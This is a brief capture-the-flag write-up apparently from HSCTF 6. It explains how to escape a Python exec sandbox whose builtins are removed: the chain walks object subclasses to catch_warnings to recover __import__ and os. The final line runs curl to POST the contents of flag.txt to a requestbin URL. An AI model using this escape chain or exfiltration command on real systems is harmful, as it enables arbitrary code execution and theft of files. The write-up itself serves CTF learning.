(full writeup at link)

see that the line env = {'__builtins__': {}} removes all builtins when our code is executed in that environment:

to_compile = f'async def func():\n{textwrap.indent(body, "  ")}'
try:
   exec(to_compile, env)

Use ().__class__.__bases__[0].__subclasses__() to get list of all classes still available import catch_warnings, and import os. Then send flag as a cookie to requestbin (alternatively you could just import something that opens the file, and return that)

a = [i for i in ().__class__.__bases__[0].__subclasses__() if i.__name__ == "catch_warnings"][0]
b = a()._module.__builtins__
c = b['__import__']('os')
c.system('curl -X POST -d "flag=$(cat flag.txt)" http://requestbin.net/r/REQUEST')

Original writeup (https://nullpxl.com/post/hsctf6-jsoninfo-keithbot-alostcause/).